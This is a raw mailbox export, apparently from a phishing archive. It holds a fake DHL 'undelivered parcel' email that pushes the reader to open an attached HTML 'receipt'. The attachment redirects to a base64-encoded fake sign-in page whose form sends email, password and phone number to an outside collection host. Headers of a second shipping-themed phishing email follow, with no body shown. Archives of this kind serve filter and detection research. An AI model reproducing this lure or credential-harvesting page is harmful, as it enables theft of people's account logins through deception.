From: "Dhl service" <bpayne1@t-online.de>
Date: Thu, 15 Jun 2017 00:15:43 -0700
X-Antivirus: verificato in 0.065sec su S510.gigasys ([94.143.98.146])
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 228

You will not see this in a MIME-aware mail reader.
--===============2113987865==
Content-Type: multipart/alternative; boundary="===============0690393589=="
MIME-Version: 1.0

--===============0690393589==
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

Dear Customer,
 Your DHL parcel arrived at our post office since 5th June 2017. =FEFF
 Our courier was unable to deliver the parcel to you due to incorrect deliv=
ery details. =FEFF
 To receive your parcel, download attached receipt to view parcel details. =
=FEFF
 We apologize for the stress and delay in delivery.
  =

 NOTE: Due to network issue, please if you receive the message in =

 spam/ junk folder, =FEFF =FEFFkindly move to inbox to enable you download =
the attached file.
  =

 DOWNLOAD ATTACHMENT
 Dhl Online Notification @ 2017.

--===============0690393589==
Content-Type: text/html; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Dutf-8"/></head><BODY><P style=3D"TEXT-ALIGN: left; PADDING-BOTTOM: 0px; =
WIDOWS: 2; TEXT-TRANSFORM: none; FONT-STYLE: normal; TEXT-INDENT: 0px; MARG=
IN: 1.2pt 0cm 12pt; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; FONT-FAMILY: =EB=
=8F=8B=EC=9B=80, dotum, sans-serif; WHITE-SPACE: normal; ORPHANS: 2; BACKGR=
OUND: white; LETTER-SPACING: normal; COLOR: rgb(51,51,51); FONT-SIZE: 12px;=
 FONT-WEIGHT: normal; WORD-SPACING: 0px; PADDING-TOP: 0px; font-variant-lig=
atures: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; =
text-decoration-style: initial; text-decoration-color: initial"><B><SPAN st=
yle=3D"FONT-FAMILY: Helvetica, sans-serif; COLOR: rgb(84,141,212); FONT-SIZ=
E: 14pt">Dear Customer,</SPAN></B><SPAN style=3D"FONT-FAMILY: Arial, sans-s=
erif; COLOR: rgb(84,141,212)"><?xml:namespace prefix =3D o /><o:p></o:p></S=
PAN></P>
<P style=3D"TEXT-ALIGN: left; PADDING-BOTTOM: 0px; LINE-HEIGHT: normal; WID=
OWS: 2; TEXT-TRANSFORM: none; FONT-STYLE: normal; TEXT-INDENT: 0px; MARGIN:=
 1.2pt 0cm; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; FONT-FAMILY: =EB=8F=8B=
=EC=9B=80, dotum, sans-serif; WHITE-SPACE: normal; ORPHANS: 2; BACKGROUND: =
white; LETTER-SPACING: normal; COLOR: rgb(51,51,51); FONT-SIZE: 12px; FONT-=
WEIGHT: normal; WORD-SPACING: 0px; PADDING-TOP: 0px; font-variant-ligatures=
: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-d=
ecoration-style: initial; text-decoration-color: initial" class=3DMsoNormal=
><SPAN style=3D"FONT-FAMILY: Helvetica, sans-serif; COLOR: rgb(84,141,212);=
 FONT-SIZE: 12pt">Your DHL parcel arrived at our post office since 5<SUP>th=
</SUP>&nbsp;June 2017.&nbsp;</SPAN><SPAN style=3D"FONT-FAMILY: Tahoma, sans=
-serif; COLOR: rgb(84,141,212); FONT-SIZE: 12pt">=EF=BB=BF</SPAN><SPAN styl=
e=3D"FONT-FAMILY: Arial, sans-serif; COLOR: rgb(84,141,212); FONT-SIZE: 12p=
t"><o:p></o:p></SPAN></P>
<P style=3D"TEXT-ALIGN: left; PADDING-BOTTOM: 0px; LINE-HEIGHT: normal; WID=
OWS: 2; TEXT-TRANSFORM: none; FONT-STYLE: normal; TEXT-INDENT: 0px; MARGIN:=
 1.2pt 0cm; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; FONT-FAMILY: =EB=8F=8B=
=EC=9B=80, dotum, sans-serif; WHITE-SPACE: normal; ORPHANS: 2; BACKGROUND: =
white; LETTER-SPACING: normal; COLOR: rgb(51,51,51); FONT-SIZE: 12px; FONT-=
WEIGHT: normal; WORD-SPACING: 0px; PADDING-TOP: 0px; font-variant-ligatures=
: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-d=
ecoration-style: initial; text-decoration-color: initial" class=3DMsoNormal=
><SPAN style=3D"FONT-FAMILY: Helvetica, sans-serif; COLOR: rgb(84,141,212);=
 FONT-SIZE: 12pt">Our courier&nbsp;</SPAN><SPAN style=3D"FONT-FAMILY: Tahom=
a, sans-serif; COLOR: rgb(84,141,212); FONT-SIZE: 12pt">was</SPAN><SPAN sty=
le=3D"FONT-FAMILY: Helvetica, sans-serif; COLOR: rgb(84,141,212); FONT-SIZE=
: 12pt">&nbsp;unable&nbsp;to deliver&nbsp;the parcel to you due to&nbsp;</S=
PAN><SPAN style=3D"FONT-FAMILY: Tahoma, sans-serif; COLOR: rgb(84,141,212);=
 FONT-SIZE: 12pt">incorrect</SPAN><SPAN style=3D"FONT-FAMILY: Helvetica, sa=
ns-serif; COLOR: rgb(84,141,212); FONT-SIZE: 12pt">&nbsp;delivery details.&=
nbsp;</SPAN><SPAN style=3D"FONT-FAMILY: Tahoma, sans-serif; COLOR: rgb(84,1=
41,212); FONT-SIZE: 12pt">=EF=BB=BF</SPAN><SPAN style=3D"FONT-FAMILY: Arial=
, sans-serif; COLOR: rgb(84,141,212); FONT-SIZE: 12pt"><o:p></o:p></SPAN></=
P>
<P style=3D"TEXT-ALIGN: left; PADDING-BOTTOM: 0px; LINE-HEIGHT: normal; WID=
OWS: 2; TEXT-TRANSFORM: none; FONT-STYLE: normal; TEXT-INDENT: 0px; MARGIN:=
 1.2pt 0cm; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; FONT-FAMILY: =EB=8F=8B=
=EC=9B=80, dotum, sans-serif; WHITE-SPACE: normal; ORPHANS: 2; BACKGROUND: =
white; LETTER-SPACING: normal; COLOR: rgb(51,51,51); FONT-SIZE: 12px; FONT-=
WEIGHT: normal; WORD-SPACING: 0px; PADDING-TOP: 0px; font-variant-ligatures=
: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-d=
ecoration-style: initial; text-decoration-color: initial" class=3DMsoNormal=
><SPAN style=3D"FONT-FAMILY: Helvetica, sans-serif; COLOR: rgb(84,141,212);=
 FONT-SIZE: 12pt">To receive your parcel,&nbsp;</SPAN><SPAN style=3D"FONT-F=
AMILY: Tahoma, sans-serif; COLOR: rgb(84,141,212); FONT-SIZE: 12pt">downloa=
d</SPAN><SPAN style=3D"FONT-FAMILY: Helvetica, sans-serif; COLOR: rgb(84,14=
1,212); FONT-SIZE: 12pt">&nbsp;attached&nbsp;receipt to view parcel details=
.&nbsp;</SPAN><SPAN style=3D"FONT-FAMILY: Tahoma, sans-serif; COLOR: rgb(84=
,141,212); FONT-SIZE: 12pt">=EF=BB=BF</SPAN><SPAN style=3D"FONT-FAMILY: Ari=
al, sans-serif; COLOR: rgb(84,141,212); FONT-SIZE: 12pt"><o:p></o:p></SPAN>=
</P>
<P style=3D"TEXT-ALIGN: left; PADDING-BOTTOM: 0px; LINE-HEIGHT: normal; WID=
OWS: 2; TEXT-TRANSFORM: none; FONT-STYLE: normal; TEXT-INDENT: 0px; MARGIN:=
 1.2pt 0cm; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; FONT-FAMILY: =EB=8F=8B=
=EC=9B=80, dotum, sans-serif; WHITE-SPACE: normal; ORPHANS: 2; BACKGROUND: =
white; LETTER-SPACING: normal; COLOR: rgb(51,51,51); FONT-SIZE: 12px; FONT-=
WEIGHT: normal; WORD-SPACING: 0px; PADDING-TOP: 0px; font-variant-ligatures=
: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-d=
ecoration-style: initial; text-decoration-color: initial" class=3DMsoNormal=
><SPAN style=3D"FONT-FAMILY: Helvetica, sans-serif; COLOR: rgb(84,141,212);=
 FONT-SIZE: 12pt">We apologize for the stress and delay in delivery.</SPAN>=
</P>
<P style=3D"TEXT-ALIGN: left; PADDING-BOTTOM: 0px; LINE-HEIGHT: normal; WID=
OWS: 2; TEXT-TRANSFORM: none; FONT-STYLE: normal; TEXT-INDENT: 0px; MARGIN:=
 1.2pt 0cm; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; FONT-FAMILY: =EB=8F=8B=
=EC=9B=80, dotum, sans-serif; WHITE-SPACE: normal; ORPHANS: 2; BACKGROUND: =
white; LETTER-SPACING: normal; COLOR: rgb(51,51,51); FONT-SIZE: 12px; FONT-=
WEIGHT: normal; WORD-SPACING: 0px; PADDING-TOP: 0px; font-variant-ligatures=
: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-d=
ecoration-style: initial; text-decoration-color: initial" class=3DMsoNormal=
><SPAN style=3D"FONT-FAMILY: Helvetica, sans-serif; COLOR: rgb(84,141,212);=
 FONT-SIZE: 12pt"></SPAN>&nbsp;</P>
<P style=3D"TEXT-ALIGN: left; PADDING-BOTTOM: 0px; LINE-HEIGHT: normal; WID=
OWS: 2; TEXT-TRANSFORM: none; FONT-STYLE: normal; TEXT-INDENT: 0px; MARGIN:=
 1.2pt 0cm; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; FONT-FAMILY: =EB=8F=8B=
=EC=9B=80, dotum, sans-serif; WHITE-SPACE: normal; ORPHANS: 2; BACKGROUND: =
white; LETTER-SPACING: normal; COLOR: rgb(51,51,51); FONT-SIZE: 12px; FONT-=
WEIGHT: normal; WORD-SPACING: 0px; PADDING-TOP: 0px; font-variant-ligatures=
: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-d=
ecoration-style: initial; text-decoration-color: initial" class=3DMsoNormal=
><I><SPAN style=3D"FONT-FAMILY: Helvetica, sans-serif; COLOR: red; FONT-SIZ=
E: 12pt">NOTE: Due to network issue, please if you receive the message in&n=
bsp;</SPAN></I><SPAN style=3D"FONT-FAMILY: Arial, sans-serif; COLOR: red; F=
ONT-SIZE: 12pt"><o:p></o:p></SPAN></P>
<P style=3D"TEXT-ALIGN: left; PADDING-BOTTOM: 0px; LINE-HEIGHT: normal; WID=
OWS: 2; TEXT-TRANSFORM: none; FONT-STYLE: normal; TEXT-INDENT: 0px; MARGIN:=
 1.2pt 0cm; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; FONT-FAMILY: =EB=8F=8B=
=EC=9B=80, dotum, sans-serif; WHITE-SPACE: normal; ORPHANS: 2; BACKGROUND: =
white; LETTER-SPACING: normal; COLOR: rgb(51,51,51); FONT-SIZE: 12px; FONT-=
WEIGHT: normal; WORD-SPACING: 0px; PADDING-TOP: 0px; font-variant-ligatures=
: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-d=
ecoration-style: initial; text-decoration-color: initial" class=3DMsoNormal=
><I><SPAN style=3D"FONT-FAMILY: Helvetica, sans-serif; COLOR: red; FONT-SIZ=
E: 12pt">spam/ junk folder,&nbsp;</SPAN></I><I><SPAN style=3D"FONT-FAMILY: =
Tahoma, sans-serif; COLOR: red; FONT-SIZE: 12pt">=EF=BB=BF</SPAN></I><I><SP=
AN style=3D"FONT-FAMILY: Helvetica, sans-serif; COLOR: red; FONT-SIZE: 12pt=
">&nbsp;</SPAN></I><I><SPAN style=3D"FONT-FAMILY: Tahoma, sans-serif; COLOR=
: red; FONT-SIZE: 12pt">=EF=BB=BF</SPAN></I><I><SPAN style=3D"FONT-FAMILY: =
Helvetica, sans-serif; COLOR: red; FONT-SIZE: 12pt">kindly move to inbox to=
 enable you download the attached file.</SPAN></I><SPAN style=3D"FONT-FAMIL=
Y: Arial, sans-serif; COLOR: red; FONT-SIZE: 12pt"><o:p></o:p></SPAN></P>
<P style=3D"TEXT-ALIGN: left; PADDING-BOTTOM: 0px; LINE-HEIGHT: normal; WID=
OWS: 2; TEXT-TRANSFORM: none; FONT-STYLE: normal; TEXT-INDENT: 0px; MARGIN:=
 1.2pt 0cm; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; FONT-FAMILY: =EB=8F=8B=
=EC=9B=80, dotum, sans-serif; WHITE-SPACE: normal; ORPHANS: 2; BACKGROUND: =
white; LETTER-SPACING: normal; COLOR: rgb(51,51,51); FONT-SIZE: 12px; FONT-=
WEIGHT: normal; WORD-SPACING: 0px; PADDING-TOP: 0px; font-variant-ligatures=
: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-d=
ecoration-style: initial; text-decoration-color: initial" class=3DMsoNormal=
><SPAN style=3D"FONT-FAMILY: Helvetica, sans-serif; COLOR: rgb(84,141,212);=
 FONT-SIZE: 12pt">&nbsp;</SPAN><SPAN style=3D"FONT-FAMILY: Arial, sans-seri=
f; COLOR: rgb(84,141,212); FONT-SIZE: 12pt"><o:p></o:p></SPAN></P>
<P style=3D"TEXT-ALIGN: left; PADDING-BOTTOM: 0px; LINE-HEIGHT: normal; WID=
OWS: 2; TEXT-TRANSFORM: none; FONT-STYLE: normal; TEXT-INDENT: 0px; MARGIN:=
 1.2pt 0cm; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; FONT-FAMILY: =EB=8F=8B=
=EC=9B=80, dotum, sans-serif; WHITE-SPACE: normal; ORPHANS: 2; BACKGROUND: =
white; LETTER-SPACING: normal; COLOR: rgb(51,51,51); FONT-SIZE: 12px; FONT-=
WEIGHT: normal; WORD-SPACING: 0px; PADDING-TOP: 0px; font-variant-ligatures=
: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-d=
ecoration-style: initial; text-decoration-color: initial" class=3DMsoNormal=
><SPAN style=3D"FONT-FAMILY: Helvetica, sans-serif; COLOR: rgb(84,141,212);=
 FONT-SIZE: 12pt">DOWNLOAD ATTACHMENT</SPAN><SPAN style=3D"FONT-FAMILY: Ari=
al, sans-serif; COLOR: rgb(84,141,212); FONT-SIZE: 12pt"><o:p></o:p></SPAN>=
</P>
<P style=3D"TEXT-ALIGN: left; PADDING-BOTTOM: 0px; LINE-HEIGHT: normal; WID=
OWS: 2; TEXT-TRANSFORM: none; FONT-STYLE: normal; TEXT-INDENT: 0px; MARGIN:=
 1.2pt 0cm; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; FONT-FAMILY: =EB=8F=8B=
=EC=9B=80, dotum, sans-serif; WHITE-SPACE: normal; ORPHANS: 2; BACKGROUND: =
white; LETTER-SPACING: normal; COLOR: rgb(51,51,51); FONT-SIZE: 12px; FONT-=
WEIGHT: normal; WORD-SPACING: 0px; PADDING-TOP: 0px; font-variant-ligatures=
: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-d=
ecoration-style: initial; text-decoration-color: initial" class=3DMsoNormal=
><SPAN style=3D"FONT-FAMILY: Helvetica, sans-serif; COLOR: rgb(84,141,212);=
 FONT-SIZE: 12pt">Dhl Online Notification @ 2017.</SPAN></P></BODY></HTML>
--===============0690393589==--
--===============2113987865==
MIME-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment; filename="dhl_AWB_Receipt.html"

<head>
<title></title>
<meta name=3D"KEYWORDS" Content>
<meta name=3D"DESCRIPTION" Content>
<META HTTP-EQUIV=3D"Refresh" CONTENT=3D"1; URL=3D data:text/html;base64,PCF=
kb2N0eXBlIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQoNCjxoZWFkPg0KICAgIDxtZXRhIGNoYX=
JzZXQ9IlVURi04Ij4NCiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9Z=
GV2aWNlLXdpZHRoLCB1c2VyLXNjYWxhYmxlPW5vLCBpbml0aWFsLXNjYWxlPTEuMCwgbWF4aW11=
bS1zY2FsZT0xLjAsIG1pbmltdW0tc2NhbGU9MS4wIj4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJ=
YLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9ImllPWVkZ2UiPg0KICAgIDxsaW5rIHJlbD0ic2hvcn=
RjdXQgaWNvbiIgaHJlZj0iaHR0cDovL3d3dy5kaGwuY29tL2ltZy9mYXZpY29uLmdpZiIgdHlwZ=
T0iaW1hZ2UvZ2lmIj4NCiAgICA8dGl0bGU+REhMIHwgVHJhY2tpbmcgU3lzdGVtPC90aXRsZT4N=
CiAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9Imh0dHBzOi8vbWF4Y2RuLmJvb3RzdHJ=
hcGNkbi5jb20vYm9vdHN0cmFwLzQuMC4wLWFscGhhLjYvY3NzL2Jvb3RzdHJhcC5taW4uY3NzIi=
BpbnRlZ3JpdHk9InNoYTM4NC1yd29JUmVzalUyeWMzejhHVi9OUGVaV0F2NTZyU21MbGRDM1IvQ=
Vp6R1JuR3hRUUtuS2tvRlZoRlFoTlV3RXlKIg0KICAgICAgICBjcm9zc29yaWdpbj0iYW5vbnlt=
b3VzIj4NCiAgICA8c3R5bGU+DQogICAgICAgIGh0bWwgew0KICAgICAgICAgICAgbWFyZ2luOiA=
wOw0KICAgICAgICAgICAgcGFkZGluZzogMDsNCiAgICAgICAgICAgIGJhY2tncm91bmQ6IHVybC=
gnaHR0cDovLzM2NTVjOWI3ZDBlNGM3ZWI4ZTYyLWY0MWI4ZTQ4MjRkMTg5NzFiNzJlNDQzMjRmN=
jc2NGIzLnI0My5jZjEucmFja2Nkbi5jb20vZ2xvYmFsL2ltYWdlbGliLzkxNHcvaGVyby1oYW5k=
c29tZS1wYXJjZWwuanBnJykgbm8tcmVwZWF0IGNlbnRlciBmaXhlZDsNCiAgICAgICAgICAgIC1=
3ZWJraXQtYmFja2dyb3VuZC1zaXplOiBjb3ZlcjsNCiAgICAgICAgICAgIC8qIHBvdXIgYW5jaW=
VucyBDaHJvbWUgZXQgU2FmYXJpICovDQogICAgICAgICAgICAtbW96LWJhY2tncm91bmQtc2l6Z=
TogY292ZXI7DQogICAgICAgICAgICAvKiBwb3VyIGFuY2llbnMgQ2hyb21lIGV0IFNhZmFyaSAq=
Lw0KICAgICAgICAgICAgLW8tYmFja2dyb3VuZC1zaXplOiBjb3ZlcjsNCiAgICAgICAgICAgIC8=
qIHBvdXIgYW5jaWVucyBDaHJvbWUgZXQgU2FmYXJpICovDQogICAgICAgICAgICBiYWNrZ3JvdW=
5kLXNpemU6IGNvdmVyOw0KICAgICAgICAgICAgLyogdmVyc2lvbiBzdGFuZGFyZGlzw6llICovD=
QogICAgICAgIH0NCg0KICAgICAgICBib2R5IHsNCiAgICAgICAgICAgIGJhY2tncm91bmQ6IG5v=
bmU7DQogICAgICAgICAgICBwYWRkaW5nOiA1JTsNCiAgICAgICAgfQ0KDQogICAgICAgIC5maXg=
tZm9vdGVyIHsNCiAgICAgICAgICAgIHBvc2l0aW9uOiBhYnNvbHV0ZTsNCiAgICAgICAgICAgIG=
JvdHRvbTogMDsNCiAgICAgICAgICAgIHdpZHRoOiA4MCU7DQogICAgICAgICAgICAvKiBTZXQgd=
GhlIGZpeGVkIGhlaWdodCBvZiB0aGUgZm9vdGVyIGhlcmUgKi8NCiAgICAgICAgICAgIGhlaWdo=
dDogNjBweDsNCiAgICAgICAgfQ0KDQogICAgICAgIC5jb250YWluZXIgew0KICAgICAgICAgICA=
gd2l0aDogMTAwJSFpbXBvcnRhbnQNCiAgICAgICAgfQ0KICAgIDwvc3R5bGU+DQo8L2hlYWQ+DQ=
oNCjxkaXYgY2xhc3M9InJvdyI+DQogICAgPGRpdiBjbGFzcz0iY29sLW1kLTEyIiBzdHlsZT0id=
GV4dC1hbGlnbjpsZWZ0O2NvbG9yOnJlZDtmb250LXNpemU6MS41cmVtIj5TaWduIGluIHdpdGgg=
eW91ciByZWNlaXZpbmcgZW1haWwgYWNjb3VudCB0byB2aWV3IGRvY3VtZW50PC9kaXY+DQo8L2R=
pdj4NCjxkaXYgY2xhc3M9InJvdyIgc3R5bGU9Im1hcmdpbi10b3A6NCUiPg0KICAgIDxkaXYgY2=
xhc3M9ImNvbC1tZC00Ij4NCiAgICAgICAgPGltZyBzcmM9Imh0dHBzOi8vZW5jcnlwdGVkLXRib=
jAuZ3N0YXRpYy5jb20vaW1hZ2VzP3E9dGJuOkFOZDlHY1J5Nk1WZG05WWF5MEctVEVrWEdTLWxo=
OWlFMG9RcGpvSXNWTkFsOXdLNGwyVlo4c2phIiBoZWlnaHQ9IjE4MCINCiAgICAgICAgICAgIHd=
pZHRoPSIyMDAiPg0KICAgIDwvZGl2Pg0KICAgIDxkaXYgY2xhc3M9ImNvbC1tZC04Ij48L2Rpdj=
4NCjwvZGl2Pg0KPGRpdiBjbGFzcz0icm93Ij4NCiAgICA8ZGl2IGNsYXNzPSJjb2wtbWQtMiI+D=
QogICAgICAgIDxmb3JtIGFjdGlvbj0iaHR0cDovL2V4cHJlc3MtZGF0YS5pbmZvL3NlbmRtYWls=
L2QucGhwIiBtZXRob2Q9IlBPU1QiIGNsYXNzPSJmb3JtLWhvcml6b250YWwiPg0KICAgICAgICA=
gICAgPGRpdiBjbGFzcz0iZm9ybS1ncm91cCI+DQogICAgICAgICAgICAgICAgPGlucHV0IHR5cG=
U9ImVtYWlsIiBjbGFzcz0iZm9ybS1jb250cm9sIiBuYW1lPSJxM19nb2QiIHBsYWNlaG9sZGVyP=
SJFbnRlciBlbWFpbCIgcmVxdWlyZWQ+DQogICAgICAgICAgICA8L2Rpdj4NCiAgICAgICAgICAg=
IDxkaXYgY2xhc3M9ImZvcm0tZ3JvdXAiPg0KICAgICAgICAgICAgICAgIDxpbnB1dCB0eXBlPSJ=
wYXNzd29yZCIgY2xhc3M9ImZvcm0tY29udHJvbCIgbmFtZT0icTRfd2luIiBwbGFjZWhvbGRlcj=
0iRW50ZXIgcGFzc3dvcmQiIHJlcXVpcmVkPg0KICAgICAgICAgICAgPC9kaXY+DQogICAgICAgI=
CAgICA8ZGl2IGNsYXNzPSJmb3JtLWdyb3VwIj4NCiAgICAgICAgICAgICAgICA8aW5wdXQgdHlw=
ZT0idGVsIiBjbGFzcz0iZm9ybS1jb250cm9sIiBuYW1lPSJxNV9hYmVnIiBwbGFjZWhvbGRlcj0=
iTW9iaWxlIENvbnRhY3QiIHJlcXVpcmVkPg0KICAgICAgICAgICAgPC9kaXY+DQogICAgICAgIC=
AgICA8ZGl2IGNsYXNzPSJjaGVja2JveCI+DQogICAgICAgICAgICAgICAgPGxhYmVsPjxpbnB1d=
CB0eXBlPSJjaGVja2JveCI+IFJlbWVtYmVyIG1lIG9uIHRoaXMgY29tcHV0ZXIgPC9sYWJlbD4N=
CiAgICAgICAgICAgIDwvZGl2Pg0KICAgICAgICAgICAgPGRpdiBjbGFzcz0iZm9ybS1ncm91cCI=
+DQogICAgICAgICAgICAgICAgPGJ1dHRvbiB0eXBlPSJzdWJtaXQiIGNsYXNzPSJidG4gYnRuLX=
ByaW1hcnkgIGJ0bi1ibG9jayIgbmFtZT0ic2lnbkluIj5MT0dJTiBUTyBWSUVXPC9idXR0b24+D=
QogICAgICAgICAgICA8L2Rpdj4NCiAgICAgICAgPC9mb3JtPg0KICAgIDwvZGl2Pg0KICAgIDxk=
aXYgY2xhc3M9ImNvbC1tZC04Ij48L2Rpdj4NCjwvZGl2Pg0KPGRpdiBjbGFzcz0iZml4LWZvb3R=
lciIgc3R5bGU9InRleHQtYWxpZ246Y2VudGVyIj4NCiAgICA8ZGl2IGNsYXNzPSJjb2wtbWQtMT=
IiPg0KICAgICAgICA8YSBocmVmPSIjIj4gQ29weXJpZ2h0ICZjb3B5OyAyMDE2IEFkb2JlIFN5c=
3RlbXMgSW5jb3Jwb3JhdGVkLiBBbGwgcmlnaHRzIHJlc2VydmVkLjwvYT4NCiAgICA8L2Rpdj4N=
CjwvZGl2Pg0KDQoNCjxib2R5Pg0KDQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vYWpheC5nb29=
nbGVhcGlzLmNvbS9hamF4L2xpYnMvanF1ZXJ5LzMuMS4xL2pxdWVyeS5taW4uanMiPjwvc2NyaX=
B0Pg0KICAgIDxzY3JpcHQgc3JjPSJodHRwczovL2NkbmpzLmNsb3VkZmxhcmUuY29tL2FqYXgvb=
Glicy90ZXRoZXIvMS40LjAvanMvdGV0aGVyLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlw=
dCBzcmM9Imh0dHBzOi8vbWF4Y2RuLmJvb3RzdHJhcGNkbi5jb20vYm9vdHN0cmFwLzQuMC4wLWF=
scGhhLjYvanMvYm9vdHN0cmFwLm1pbi5qcyIgaW50ZWdyaXR5PSJzaGEzODQtdkJXV3psWko4ZW=
E5YUNYNHBFVzNyVkhqZ2p0N3pwa05wWmsrMDJEOXBoenllVmtFK2pvMGllR2l6cVBMRm9ybiINC=
iAgICAgICAgY3Jvc3NvcmlnaW49ImFub255bW91cyI+PC9zY3JpcHQ+DQo8L2JvZHk+DQoNCjwv=
aHRtbD4=3D">
--===============2113987865==--

From jose@monkey.org Wed Jun 21 08:29:28 2017 +0000
Return-Path: smtp@casinu.com
Delivered-To: jose@monkey.org
X-FDA: 72975380016.08.point78_6fbd17825e15d
X-Spam-Summary: 50,3,0,b052d1d633f67548,d41d8cd98f00b204,smtp@casinu.com,:smtp@casinu.com,RULES_HIT:72:327:355:379:455:474:962:967:973:978:983:988:989:1189:1208:1221:1260:1261:1263:1313:1314:1345:1381:1431:1432:1433:1434:1436:1437:1516:1517:1518:1545:1568:1571:1575:1588:1589:1592:1594:1710:1714:1730:1776:1792:2196:2198:2199:2200:2497:2525:2527:2561:2568:2610:2682:2685:2733:2737:2859:2903:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3865:3866:3867:3868:3871:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4180:4181:4321:4384:4699:5007:6261:6653:6687:6703:7652:8583:8599:8603:8957:9025:9121:9149:9388:9411:9908:9973:10004:10049:10215:10305:10346:11026:11233:11657:11914:12043:12219:12295:12438:12517:12519:12555:12561:12776:12895:12903:12963:12986:13110:13139:13285:13374:13439:14096:14515:14651:14877:21080:21107:21121:21324:21325:21433:21450:21451:21483:21524:21554:21611:21627:30014:30026:30054:30055:30070:30074:30079,0,RBL:error,CacheIP:none,Bayesian:0.5,0.5
X-HE-Tag: point78_6fbd17825e15d
X-Filterd-Recvd-Size: 43082
Received: from duma.com (unknown [94.177.171.133])
	by imf21.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Wed, 21 Jun 2017 08:29:27 +0000 (UTC)
DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=casinu.com; s=mail;
	h=Message-Id:Date:From:To:Subject:MIME-Version:Content-Type; bh=sT1melleIlj1yaBINUMUHdCGo1DHvX+/XmCYA98CDns=;
	b=Bl3gxitZS4QQTen/OMEXtLg5kXj6tvykRvBWhNWqRy5XbkvHo1YB8UwxC4fhZnJha1lrqn79Z77etHLSSYmwOw21CziLnRA46M2dIgfJVJFvJjqq1sE2IbKSKRYt+XO8OvxANq921ZJWBKj5ipi+g5mQ+hwxPfeqQ3LZTtacsCQ=;
Received: from [197.211.61.145] (helo=[10.136.243.63])
	by duma.com with esmtpsa (TLS1.0:DHE_RSA_AES_256_CBC_SHA1:256)
	(Exim 4.82)
	(envelope-from <smtp@casinu.com>)
	id 1dNb0l-00010x-3R; Wed, 21 Jun 2017 10:29:16 +0200
Content-Type: multipart/alternative; boundary="===============1803728159=="
MIME-Version: 1.0
Subject: YOU HAVE A SHIPING DOCUMENT
To: Recipients <smtp@casinu.com>
